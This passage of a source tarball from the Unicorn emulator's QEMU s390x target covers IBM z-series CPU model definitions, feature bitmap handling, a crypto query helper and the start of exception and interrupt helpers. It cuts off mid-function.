EC GA2"), CPUDEF_INIT(0x2098, 10, 2, 43, 0x00000000U, "z10BC", "IBM System z10 BC GA1"), CPUDEF_INIT(0x2097, 10, 3, 43, 0x00000000U, "z10EC.3", "IBM System z10 EC GA3"), CPUDEF_INIT(0x2098, 10, 3, 43, 0x00000000U, "z10BC.2", "IBM System z10 BC GA2"), CPUDEF_INIT(0x2817, 11, 1, 44, 0x08000000U, "z196", "IBM zEnterprise 196 GA1"), CPUDEF_INIT(0x2817, 11, 2, 44, 0x08000000U, "z196.2", "IBM zEnterprise 196 GA2"), CPUDEF_INIT(0x2818, 11, 2, 44, 0x08000000U, "z114", "IBM zEnterprise 114 GA1"), CPUDEF_INIT(0x2827, 12, 1, 44, 0x08000000U, "zEC12", "IBM zEnterprise EC12 GA1"), CPUDEF_INIT(0x2827, 12, 2, 44, 0x08000000U, "zEC12.2", "IBM zEnterprise EC12 GA2"), CPUDEF_INIT(0x2828, 12, 2, 44, 0x08000000U, "zBC12", "IBM zEnterprise BC12 GA1"), CPUDEF_INIT(0x2964, 13, 1, 47, 0x08000000U, "z13", "IBM z13 GA1"), CPUDEF_INIT(0x2964, 13, 2, 47, 0x08000000U, "z13.2", "IBM z13 GA2"), CPUDEF_INIT(0x2965, 13, 2, 47, 0x08000000U, "z13s", "IBM z13s GA1"), CPUDEF_INIT(0x3906, 14, 1, 47, 0x08000000U, "z14", "IBM z14 GA1"), CPUDEF_INIT(0x3906, 14, 2, 47, 0x08000000U, "z14.2", "IBM z14 GA2"), CPUDEF_INIT(0x3907, 14, 1, 47, 0x08000000U, "z14ZR1", "IBM z14 Model ZR1 GA1"), CPUDEF_INIT(0x8561, 15, 1, 47, 0x08000000U, "gen15a", "IBM z15 GA1"), CPUDEF_INIT(0x8562, 15, 1, 47, 0x08000000U, "gen15b", "IBM 8562 GA1"), }; #define QEMU_MAX_CPU_TYPE 0x2964 #define QEMU_MAX_CPU_GEN 13 #define QEMU_MAX_CPU_EC_GA 2 static const S390FeatInit qemu_max_cpu_feat_init = { S390_FEAT_LIST_QEMU_MAX }; static S390FeatBitmap qemu_max_cpu_feat; /* features part of a base model but not relevant for finding a base model */ S390FeatBitmap ignored_base_feat; void s390_cpudef_featoff(uint8_t gen, uint8_t ec_ga, S390Feat feat) { const S390CPUDef *def; def = s390_find_cpu_def(0, gen, ec_ga, NULL); clear_bit(feat, (unsigned long *)&def->default_feat); } void s390_cpudef_featoff_greater(uint8_t gen, uint8_t ec_ga, S390Feat feat) { int i; for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { const S390CPUDef *def = &s390_cpu_defs[i]; if (def->gen < gen) { continue; } if (def->gen == gen && def->ec_ga < ec_ga) { continue; } clear_bit(feat, (unsigned long *)&def->default_feat); } } void s390_cpudef_group_featoff_greater(uint8_t gen, uint8_t ec_ga, S390FeatGroup group) { const S390FeatGroupDef *group_def = s390_feat_group_def(group); S390FeatBitmap group_def_off; int i; bitmap_complement(group_def_off, group_def->feat, S390_FEAT_MAX); for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { const S390CPUDef *cpu_def = &s390_cpu_defs[i]; if (cpu_def->gen < gen) { continue; } if (cpu_def->gen == gen && cpu_def->ec_ga < ec_ga) { continue; } bitmap_and((unsigned long *)&cpu_def->default_feat, cpu_def->default_feat, group_def_off, S390_FEAT_MAX); } } uint32_t s390_get_hmfai(void) { static S390CPU *cpu; if (!cpu) { cpu = S390_CPU(qemu_get_cpu(NULL, 0)); } if (!cpu || !cpu->model) { return 0; } return cpu->model->def->hmfai; } uint8_t s390_get_mha_pow(void) { static S390CPU *cpu; if (!cpu) { cpu = S390_CPU(qemu_get_cpu(NULL, 0)); } if (!cpu || !cpu->model) { return 0; } return cpu->model->def->mha_pow; } uint32_t s390_get_ibc_val(void) { uint16_t unblocked_ibc, lowest_ibc; static S390CPU *cpu; if (!cpu) { cpu = S390_CPU(qemu_get_cpu(NULL, 0)); } if (!cpu || !cpu->model) { return 0; } unblocked_ibc = s390_ibc_from_cpu_model(cpu->model); lowest_ibc = cpu->model->lowest_ibc; /* the lowest_ibc always has to be <= unblocked_ibc */ if (!lowest_ibc || lowest_ibc > unblocked_ibc) { return 0; } return ((uint32_t) lowest_ibc << 16) | unblocked_ibc; } void s390_get_feat_block(struct uc_struct *uc, S390FeatType type, uint8_t *data) { S390CPU *cpu = S390_CPU(qemu_get_cpu(uc, 0)); s390_fill_feat_block(cpu->model->features, type, data); } bool s390_has_feat(struct uc_struct *uc, S390Feat feat) { S390CPU *cpu = S390_CPU(qemu_get_cpu(uc, 0)); if (!cpu->model) { if (feat == S390_FEAT_ZPCI) { return true; } return false; } return test_bit(feat, cpu->model->features); } uint8_t s390_get_gen_for_cpu_type(uint16_t type) { int i; for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { if (s390_cpu_defs[i].type == type) { return s390_cpu_defs[i].gen; } } return 0; } const S390CPUDef *s390_find_cpu_def(uint16_t type, uint8_t gen, uint8_t ec_ga, S390FeatBitmap features) { const S390CPUDef *last_compatible = NULL; const S390CPUDef *matching_cpu_type = NULL; int i; if (!gen) { ec_ga = 0; } if (!gen && type) { gen = s390_get_gen_for_cpu_type(type); } for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { const S390CPUDef *def = &s390_cpu_defs[i]; S390FeatBitmap missing; /* don't even try newer generations if we know the generation */ if (gen) { if (def->gen > gen) { break; } else if (def->gen == gen && ec_ga && def->ec_ga > ec_ga) { break; } } if (features) { /* see if the model satisfies the minimum features */ bitmap_andnot(missing, def->base_feat, features, S390_FEAT_MAX); /* * Ignore certain features that are in the base model, but not * relevant for the search (esp. MSA subfunctions). */ bitmap_andnot(missing, missing, ignored_base_feat, S390_FEAT_MAX); if (!bitmap_empty(missing, S390_FEAT_MAX)) { break; } } /* stop the search if we found the exact model */ if (def->type == type && def->ec_ga == ec_ga) { return def; } /* remember if we've at least seen one with the same cpu type */ if (def->type == type) { matching_cpu_type = def; } last_compatible = def; } /* prefer the model with the same cpu type, esp. don't take the BC for EC */ if (matching_cpu_type) { return matching_cpu_type; } return last_compatible; } static S390CPUModel *get_max_cpu_model(void); static S390CPUModel *get_max_cpu_model(void) { static S390CPUModel max_model; static bool cached; if (cached) { return &max_model; } max_model.def = s390_find_cpu_def(QEMU_MAX_CPU_TYPE, QEMU_MAX_CPU_GEN, QEMU_MAX_CPU_EC_GA, NULL); bitmap_copy(max_model.features, qemu_max_cpu_feat, S390_FEAT_MAX); cached = true; return &max_model; } static inline void apply_cpu_model(const S390CPUModel *model) { static S390CPUModel applied_model; static bool applied; /* * We have the same model for all VCPUs. KVM can only be configured before * any VCPUs are defined in KVM. */ if (applied) { if (model && memcmp(&applied_model, model, sizeof(S390CPUModel))) { // error_setg(errp, "Mixed CPU models are not supported on s390x."); } return; } applied = true; if (model) { applied_model = *model; } } void s390_realize_cpu_model(CPUState *cs) { S390CPU *cpu = S390_CPU(cs); const S390CPUModel *max_model; if (!cpu->model) { /* no host model support -> perform compatibility stuff */ apply_cpu_model(NULL); return; } max_model = get_max_cpu_model(); if (!max_model) { //error_prepend(errp, "CPU models are not available: "); return; } /* copy over properties that can vary */ cpu->model->lowest_ibc = max_model->lowest_ibc; cpu->model->cpu_id = max_model->cpu_id; cpu->model->cpu_id_format = max_model->cpu_id_format; cpu->model->cpu_ver = max_model->cpu_ver; apply_cpu_model(cpu->model); cpu->env.cpuid = s390_cpuid_from_cpu_model(cpu->model); /* basic mode, write the cpu address into the first 4 bit of the ID */ cpu->env.cpuid = deposit64(cpu->env.cpuid, 54, 4, cpu->env.core_id); } static void s390_cpu_model_initfn(CPUState *obj) { S390CPU *cpu = S390_CPU(obj); S390CPUClass *xcc = S390_CPU_GET_CLASS(cpu); cpu->model = g_malloc0(sizeof(*cpu->model)); /* copy the model, so we can modify it */ cpu->model->def = xcc->cpu_def; if (xcc->is_static) { /* base model - features will never change */ bitmap_copy(cpu->model->features, cpu->model->def->base_feat, S390_FEAT_MAX); } else { /* latest model - features can change */ bitmap_copy(cpu->model->features, cpu->model->def->default_feat, S390_FEAT_MAX); } } static S390CPUDef s390_qemu_cpu_def; static S390CPUModel s390_qemu_cpu_model; /* Set the qemu CPU model (on machine initialization). Must not be called * once CPUs have been created. */ void s390_set_qemu_cpu_model(uint16_t type, uint8_t gen, uint8_t ec_ga, const S390FeatInit feat_init) { const S390CPUDef *def = s390_find_cpu_def(type, gen, ec_ga, NULL); g_assert(def); //g_assert(QTAILQ_EMPTY_RCU(&cpus)); /* TCG emulates some features that can usually not be enabled with * the emulated machine generation. Make sure they can be enabled * when using the QEMU model by adding them to full_feat. We have * to copy the definition to do that. */ memcpy(&s390_qemu_cpu_def, def, sizeof(s390_qemu_cpu_def)); bitmap_or(s390_qemu_cpu_def.full_feat, s390_qemu_cpu_def.full_feat, qemu_max_cpu_feat, S390_FEAT_MAX); /* build the CPU model */ s390_qemu_cpu_model.def = &s390_qemu_cpu_def; bitmap_zero(s390_qemu_cpu_model.features, S390_FEAT_MAX); s390_init_feat_bitmap(feat_init, s390_qemu_cpu_model.features); } static void s390_qemu_cpu_model_initfn(CPUState *obj) { S390CPU *cpu = S390_CPU(obj); cpu->model = g_malloc0(sizeof(*cpu->model)); /* copy the CPU model so we can modify it */ memcpy(cpu->model, &s390_qemu_cpu_model, sizeof(*cpu->model)); } static void s390_max_cpu_model_initfn(CPUState *obj) { const S390CPUModel *max_model; S390CPU *cpu = S390_CPU(obj); max_model = get_max_cpu_model(); cpu->model = g_new(S390CPUModel, 1); /* copy the CPU model so we can modify it */ memcpy(cpu->model, max_model, sizeof(*cpu->model)); } void s390_cpu_model_finalize(CPUState *obj) { S390CPU *cpu = S390_CPU(obj); g_free(cpu->model); g_free(cpu->ss.keydata); cpu->model = NULL; } static void s390_base_cpu_model_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { S390CPUClass *xcc = S390_CPU_CLASS(oc); /* all base models are migration safe */ xcc->cpu_def = (const S390CPUDef *) data; xcc->is_static = true; // xcc->desc = xcc->cpu_def->desc; } static void s390_cpu_model_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { S390CPUClass *xcc = S390_CPU_CLASS(oc); /* model that can change between QEMU versions */ xcc->cpu_def = (const S390CPUDef *) data; // xcc->is_migration_safe = true; // xcc->desc = xcc->cpu_def->desc; } static void s390_qemu_cpu_model_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { //S390CPUClass *xcc = S390_CPU_CLASS(oc); //xcc->desc = g_strdup_printf("QEMU Virtual CPU version %s", // qemu_hw_version()); } static void s390_max_cpu_model_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { //S390CPUClass *xcc = S390_CPU_CLASS(oc); /* * The "max" model is neither static nor migration safe. Under KVM * it represents the "host" model. Under TCG it represents some kind of * "qemu" CPU model without compat handling and maybe with some additional * CPU features that are not yet unlocked in the "qemu" model. */ //xcc->desc = // "Enables all features supported by the accelerator in the current host"; } static void init_ignored_base_feat(void) { static const int feats[] = { /* MSA subfunctions that could not be available on certain machines */ S390_FEAT_KMAC_DEA, S390_FEAT_KMAC_TDEA_128, S390_FEAT_KMAC_TDEA_192, S390_FEAT_KMC_DEA, S390_FEAT_KMC_TDEA_128, S390_FEAT_KMC_TDEA_192, S390_FEAT_KM_DEA, S390_FEAT_KM_TDEA_128, S390_FEAT_KM_TDEA_192, S390_FEAT_KIMD_SHA_1, S390_FEAT_KLMD_SHA_1, /* CSSKE is deprecated on newer generations */ S390_FEAT_CONDITIONAL_SSKE, }; int i; for (i = 0; i < ARRAY_SIZE(feats); i++) { set_bit(feats[i], ignored_base_feat); } } void s390_init_cpu_model(uc_engine *uc, uc_cpu_s390x cpu_model) { static const S390FeatInit qemu_latest_init = { S390_FEAT_LIST_QEMU_LATEST }; int i; init_ignored_base_feat(); /* init all bitmaps from gnerated data initially */ s390_init_feat_bitmap(qemu_max_cpu_feat_init, qemu_max_cpu_feat); for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { s390_init_feat_bitmap(s390_cpu_defs[i].base_init, s390_cpu_defs[i].base_feat); s390_init_feat_bitmap(s390_cpu_defs[i].default_init, s390_cpu_defs[i].default_feat); s390_init_feat_bitmap(s390_cpu_defs[i].full_init, s390_cpu_defs[i].full_feat); } /* initialize the qemu model with latest definition */ s390_set_qemu_cpu_model(QEMU_MAX_CPU_TYPE, QEMU_MAX_CPU_GEN, QEMU_MAX_CPU_EC_GA, qemu_latest_init); if (cpu_model < ARRAY_SIZE(s390_cpu_defs)) { s390_base_cpu_model_class_init(uc, uc->cpu->cc, (void *) &s390_cpu_defs[cpu_model]); s390_cpu_model_class_init(uc, uc->cpu->cc, (void *) &s390_cpu_defs[cpu_model]); s390_cpu_model_initfn(uc->cpu); } else if (cpu_model == UC_CPU_S390X_MAX) { s390_max_cpu_model_class_init(uc, uc->cpu->cc, NULL); s390_max_cpu_model_initfn(uc->cpu); } else if (cpu_model == UC_CPU_S390X_QEMU) { s390_qemu_cpu_model_class_init(uc, uc->cpu->cc, NULL); s390_qemu_cpu_model_initfn(uc->cpu); } } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu_models.h��������������������������������������������������������0000664�0000000�0000000�00000007776�14675241067�0020653�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * CPU models for s390x * * Copyright 2016 IBM Corp. * * Author(s): David Hildenbrand <dahi@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef TARGET_S390X_CPU_MODELS_H #define TARGET_S390X_CPU_MODELS_H #include "cpu_features.h" #include "gen-features.h" #include "hw/core/cpu.h" #include "unicorn/s390x.h" #include "uc_priv.h" /* static CPU definition */ struct S390CPUDef { const char *name; /* name exposed to the user */ const char *desc; /* description exposed to the user */ uint8_t gen; /* hw generation identification */ uint16_t type; /* cpu type identification */ uint8_t ec_ga; /* EC GA version (on which also the BC is based) */ uint8_t mha_pow; /* Maximum Host Adress Power, mha = 2^pow-1 */ uint32_t hmfai; /* hypervisor-managed facilities */ /* base/min features, must never be changed between QEMU versions */ S390FeatBitmap base_feat; /* used to init base_feat from generated data */ S390FeatInit base_init; /* deafault features, QEMU version specific */ S390FeatBitmap default_feat; /* used to init default_feat from generated data */ S390FeatInit default_init; /* max allowed features, QEMU version specific */ S390FeatBitmap full_feat; /* used to init full_feat from generated data */ S390FeatInit full_init; }; /* CPU model based on a CPU definition */ struct S390CPUModel { const S390CPUDef *def; S390FeatBitmap features; /* values copied from the "host" model, can change during migration */ uint16_t lowest_ibc; /* lowest IBC that the hardware supports */ uint32_t cpu_id; /* CPU id */ uint8_t cpu_id_format; /* CPU id format bit */ uint8_t cpu_ver; /* CPU version, usually "ff" for kvm */ }; /* * CPU ID * * bits 0-7: Zeroes (ff for kvm) * bits 8-31: CPU ID (serial number) * bits 32-47: Machine type * bit 48: CPU ID format * bits 49-63: Zeroes */ #define cpuid_type(x) (((x) >> 16) & 0xffff) #define cpuid_id(x) (((x) >> 32) & 0xffffff) #define cpuid_ver(x) (((x) >> 56) & 0xff) #define cpuid_format(x) (((x) >> 15) & 0x1) #define lowest_ibc(x) (((uint32_t)(x) >> 16) & 0xfff) #define unblocked_ibc(x) ((uint32_t)(x) & 0xfff) #define has_ibc(x) (lowest_ibc(x) != 0) #define S390_GEN_Z10 0xa #define ibc_gen(x) (x == 0 ? 0 : ((x >> 4) + S390_GEN_Z10)) #define ibc_ec_ga(x) (x & 0xf) void s390_cpudef_featoff(uint8_t gen, uint8_t ec_ga, S390Feat feat); void s390_cpudef_featoff_greater(uint8_t gen, uint8_t ec_ga, S390Feat feat); void s390_cpudef_group_featoff_greater(uint8_t gen, uint8_t ec_ga, S390FeatGroup group); uint32_t s390_get_hmfai(void); uint8_t s390_get_mha_pow(void); uint32_t s390_get_ibc_val(void); static inline uint16_t s390_ibc_from_cpu_model(const S390CPUModel *model) { uint16_t ibc = 0; if (model->def->gen >= S390_GEN_Z10) { ibc = ((model->def->gen - S390_GEN_Z10) << 4) + model->def->ec_ga; } return ibc; } void s390_get_feat_block(struct uc_struct *uc, S390FeatType type, uint8_t *data); bool s390_has_feat(struct uc_struct *uc, S390Feat feat); uint8_t s390_get_gen_for_cpu_type(uint16_t type); static inline bool s390_known_cpu_type(uint16_t type) { return s390_get_gen_for_cpu_type(type) != 0; } static inline uint64_t s390_cpuid_from_cpu_model(const S390CPUModel *model) { return ((uint64_t)model->cpu_ver << 56) | ((uint64_t)model->cpu_id << 32) | ((uint64_t)model->def->type << 16) | (model->def->gen == 7 ? 0 : (uint64_t)model->cpu_id_format << 15); } S390CPUDef const *s390_find_cpu_def(uint16_t type, uint8_t gen, uint8_t ec_ga, S390FeatBitmap features); void s390_init_cpu_model(uc_engine *uc, uc_cpu_s390x cpu_model); void s390_cpu_model_finalize(CPUState *obj); #endif /* TARGET_S390X_CPU_MODELS_H */ ��unicorn-2.1.1/qemu/target/s390x/crypto_helper.c�����������������������������������������������������0000664�0000000�0000000�00000003010�14675241067�0021344�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * s390x crypto helpers * * Copyright (c) 2017 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "internal.h" #include "tcg_s390x.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" uint32_t HELPER(msa)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t type) { const uintptr_t ra = GETPC(); const uint8_t mod = env->regs[0] & 0x80ULL; const uint8_t fc = env->regs[0] & 0x7fULL; uint8_t subfunc[16] = { 0 }; uint64_t param_addr; int i; switch (type) { case S390_FEAT_TYPE_KMAC: case S390_FEAT_TYPE_KIMD: case S390_FEAT_TYPE_KLMD: case S390_FEAT_TYPE_PCKMO: case S390_FEAT_TYPE_PCC: if (mod) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } break; } s390_get_feat_block(env->uc, type, subfunc); if (!test_be_bit(fc, subfunc)) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } switch (fc) { case 0: /* query subfunction */ for (i = 0; i < 16; i++) { param_addr = wrap_address(env, env->regs[1] + i); cpu_stb_data_ra(env, param_addr, subfunc[i], ra); } break; default: /* we don't implement any other subfunction yet */ g_assert_not_reached(); } return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/excp_helper.c�������������������������������������������������������0000664�0000000�0000000�00000047235�14675241067�0021004�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * s390x exception / interrupt helpers * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2011 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/helper-proto.h" #include "qemu/timer.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "hw/s390x/ioinst.h" //include "exec/address-spaces.h" #include "tcg_s390x.h" #include "sysemu/sysemu.h" //#include "hw/s390x/s390_flic.h" void QEMU_NORETURN tcg_s390_program_interrupt(CPUS390XState *env, uint32_t code, uintptr_t ra) { CPUState *cs = env_cpu(env); cpu_restore_state(cs, ra, true); //qemu_log_mask(CPU_LOG_INT, "program interrupt at %#" PRIx64 "\n", // env->psw.addr); trigger_pgm_exception(env, code); cpu_loop_exit(cs); } void QEMU_NORETURN tcg_s390_data_exception(CPUS390XState *env, uint32_t dxc, uintptr_t ra) { g_assert(dxc <= 0xff); /* Store the DXC into the lowcore */ #ifdef UNICORN_ARCH_POSTFIX glue(stl_phys, UNICORN_ARCH_POSTFIX)(env->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, data_exc_code), dxc); #else stl_phys(env->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, data_exc_code), dxc); #endif /* Store the DXC into the FPC if AFP is enabled */ if (env->cregs[0] & CR0_AFP) { env->fpc = deposit32(env->fpc, 8, 8, dxc); } tcg_s390_program_interrupt(env, PGM_DATA, ra); } void QEMU_NORETURN tcg_s390_vector_exception(CPUS390XState *env, uint32_t vxc, uintptr_t ra) { g_assert(vxc <= 0xff); /* Always store the VXC into the lowcore, without AFP it is undefined */ #ifdef UNICORN_ARCH_POSTFIX glue(stl_phys, UNICORN_ARCH_POSTFIX)(env->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, data_exc_code), vxc); #else stl_phys(env->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, data_exc_code), vxc); #endif /* Always store the VXC into the FPC, without AFP it is undefined */ env->fpc = deposit32(env->fpc, 8, 8, vxc); tcg_s390_program_interrupt(env, PGM_VECTOR_PROCESSING, ra); } void HELPER(data_exception)(CPUS390XState *env, uint32_t dxc) { tcg_s390_data_exception(env, dxc, GETPC()); } static inline uint64_t cpu_mmu_idx_to_asc(int mmu_idx) { switch (mmu_idx) { case MMU_PRIMARY_IDX: return PSW_ASC_PRIMARY; case MMU_SECONDARY_IDX: return PSW_ASC_SECONDARY; case MMU_HOME_IDX: return PSW_ASC_HOME; default: abort(); } } bool s390_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; target_ulong vaddr, raddr; uint64_t asc, tec; int prot, excp; //qemu_log_mask(CPU_LOG_MMU, "%s: addr 0x%" VADDR_PRIx " rw %d mmu_idx %d\n", // __func__, address, access_type, mmu_idx); vaddr = address; if (mmu_idx < MMU_REAL_IDX) { asc = cpu_mmu_idx_to_asc(mmu_idx); /* 31-Bit mode */ if (!(env->psw.mask & PSW_MASK_64)) { vaddr &= 0x7fffffff; } excp = mmu_translate(env, vaddr, access_type, asc, &raddr, &prot, &tec); } else if (mmu_idx == MMU_REAL_IDX) { /* 31-Bit mode */ if (!(env->psw.mask & PSW_MASK_64)) { vaddr &= 0x7fffffff; } excp = mmu_translate_real(env, vaddr, access_type, &raddr, &prot, &tec); } else { g_assert_not_reached(); } /* check out of RAM access */ if (!excp && !address_space_access_valid(env_cpu(env)->as, raddr, TARGET_PAGE_SIZE, access_type, MEMTXATTRS_UNSPECIFIED)) { //qemu_log_mask(CPU_LOG_MMU, // "%s: raddr %" PRIx64 " > ram_size %" PRIx64 "\n", // __func__, (uint64_t)raddr, (uint64_t)ram_size); excp = PGM_ADDRESSING; tec = 0; /* unused */ } if (!excp) { //qemu_log_mask(CPU_LOG_MMU, // "%s: set tlb %" PRIx64 " -> %" PRIx64 " (%x)\n", // __func__, (uint64_t)vaddr, (uint64_t)raddr, prot); tlb_set_page(cs, address & TARGET_PAGE_MASK, raddr, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } if (probe) { return false; } if (excp != PGM_ADDRESSING) { #ifdef UNICORN_ARCH_POSTFIX glue(stq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, trans_exc_code), tec); #else stq_phys(cs->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, trans_exc_code), tec); #endif } /* * For data accesses, ILEN will be filled in from the unwind info, * within cpu_loop_exit_restore. For code accesses, retaddr == 0, * and so unwinding will not occur. However, ILEN is also undefined * for that case -- we choose to set ILEN = 2. */ env->int_pgm_ilen = 2; trigger_pgm_exception(env, excp); cpu_loop_exit_restore(cs, retaddr); } #if 0 static void do_program_interrupt(CPUS390XState *env) { uint64_t mask, addr; LowCore *lowcore; int ilen = env->int_pgm_ilen; assert(ilen == 2 || ilen == 4 || ilen == 6); switch (env->int_pgm_code) { case PGM_PER: if (env->per_perc_atmid & PER_CODE_EVENT_NULLIFICATION) { break; } /* FALL THROUGH */ case PGM_OPERATION: case PGM_PRIVILEGED: case PGM_EXECUTE: case PGM_PROTECTION: case PGM_ADDRESSING: case PGM_SPECIFICATION: case PGM_DATA: case PGM_FIXPT_OVERFLOW: case PGM_FIXPT_DIVIDE: case PGM_DEC_OVERFLOW: case PGM_DEC_DIVIDE: case PGM_HFP_EXP_OVERFLOW: case PGM_HFP_EXP_UNDERFLOW: case PGM_HFP_SIGNIFICANCE: case PGM_HFP_DIVIDE: case PGM_TRANS_SPEC: case PGM_SPECIAL_OP: case PGM_OPERAND: case PGM_HFP_SQRT: case PGM_PC_TRANS_SPEC: case PGM_ALET_SPEC: case PGM_MONITOR: /* advance the PSW if our exception is not nullifying */ env->psw.addr += ilen; break; } //qemu_log_mask(CPU_LOG_INT, // "%s: code=0x%x ilen=%d psw: %" PRIx64 " %" PRIx64 "\n", // __func__, env->int_pgm_code, ilen, env->psw.mask, // env->psw.addr); lowcore = cpu_map_lowcore(env); /* Signal PER events with the exception. */ if (env->per_perc_atmid) { env->int_pgm_code |= PGM_PER; lowcore->per_address = cpu_to_be64(env->per_address); lowcore->per_perc_atmid = cpu_to_be16(env->per_perc_atmid); env->per_perc_atmid = 0; } lowcore->pgm_ilen = cpu_to_be16(ilen); lowcore->pgm_code = cpu_to_be16(env->int_pgm_code); lowcore->program_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->program_old_psw.addr = cpu_to_be64(env->psw.addr); mask = be64_to_cpu(lowcore->program_new_psw.mask); addr = be64_to_cpu(lowcore->program_new_psw.addr); lowcore->per_breaking_event_addr = cpu_to_be64(env->gbea); cpu_unmap_lowcore(lowcore); load_psw(env, mask, addr); } static void do_svc_interrupt(CPUS390XState *env) { uint64_t mask, addr; LowCore *lowcore; lowcore = cpu_map_lowcore(env); lowcore->svc_code = cpu_to_be16(env->int_svc_code); lowcore->svc_ilen = cpu_to_be16(env->int_svc_ilen); lowcore->svc_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->svc_old_psw.addr = cpu_to_be64(env->psw.addr + env->int_svc_ilen); mask = be64_to_cpu(lowcore->svc_new_psw.mask); addr = be64_to_cpu(lowcore->svc_new_psw.addr); cpu_unmap_lowcore(lowcore); load_psw(env, mask, addr); /* When a PER event is pending, the PER exception has to happen immediately after the SERVICE CALL one. */ if (env->per_perc_atmid) { env->int_pgm_code = PGM_PER; env->int_pgm_ilen = env->int_svc_ilen; do_program_interrupt(env); } } #define VIRTIO_SUBCODE_64 0x0D00 static void do_ext_interrupt(CPUS390XState *env) { QEMUS390FLICState *flic = QEMU_S390_FLIC(s390_get_flic()); S390CPU *cpu = env_archcpu(env); uint64_t mask, addr; uint16_t cpu_addr; LowCore *lowcore; if (!(env->psw.mask & PSW_MASK_EXT)) { cpu_abort(CPU(cpu), "Ext int w/o ext mask\n"); } lowcore = cpu_map_lowcore(env); if ((env->pending_int & INTERRUPT_EMERGENCY_SIGNAL) && (env->cregs[0] & CR0_EMERGENCY_SIGNAL_SC)) { MachineState *ms = MACHINE(qdev_get_machine()); unsigned int max_cpus = ms->smp.max_cpus; lowcore->ext_int_code = cpu_to_be16(EXT_EMERGENCY); cpu_addr = find_first_bit(env->emergency_signals, S390_MAX_CPUS); g_assert(cpu_addr < S390_MAX_CPUS); lowcore->cpu_addr = cpu_to_be16(cpu_addr); clear_bit(cpu_addr, env->emergency_signals); if (bitmap_empty(env->emergency_signals, max_cpus)) { env->pending_int &= ~INTERRUPT_EMERGENCY_SIGNAL; } } else if ((env->pending_int & INTERRUPT_EXTERNAL_CALL) && (env->cregs[0] & CR0_EXTERNAL_CALL_SC)) { lowcore->ext_int_code = cpu_to_be16(EXT_EXTERNAL_CALL); lowcore->cpu_addr = cpu_to_be16(env->external_call_addr); env->pending_int &= ~INTERRUPT_EXTERNAL_CALL; } else if ((env->pending_int & INTERRUPT_EXT_CLOCK_COMPARATOR) && (env->cregs[0] & CR0_CKC_SC)) { lowcore->ext_int_code = cpu_to_be16(EXT_CLOCK_COMP); lowcore->cpu_addr = 0; env->pending_int &= ~INTERRUPT_EXT_CLOCK_COMPARATOR; } else if ((env->pending_int & INTERRUPT_EXT_CPU_TIMER) && (env->cregs[0] & CR0_CPU_TIMER_SC)) { lowcore->ext_int_code = cpu_to_be16(EXT_CPU_TIMER); lowcore->cpu_addr = 0; env->pending_int &= ~INTERRUPT_EXT_CPU_TIMER; } else if (qemu_s390_flic_has_service(flic) && (env->cregs[0] & CR0_SERVICE_SC)) { uint32_t param; param = qemu_s390_flic_dequeue_service(flic); lowcore->ext_int_code = cpu_to_be16(EXT_SERVICE); lowcore->ext_params = cpu_to_be32(param); lowcore->cpu_addr = 0; } else { g_assert_not_reached(); } mask = be64_to_cpu(lowcore->external_new_psw.mask); addr = be64_to_cpu(lowcore->external_new_psw.addr); lowcore->external_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->external_old_psw.addr = cpu_to_be64(env->psw.addr); cpu_unmap_lowcore(lowcore); load_psw(env, mask, addr); } static void do_io_interrupt(CPUS390XState *env) { 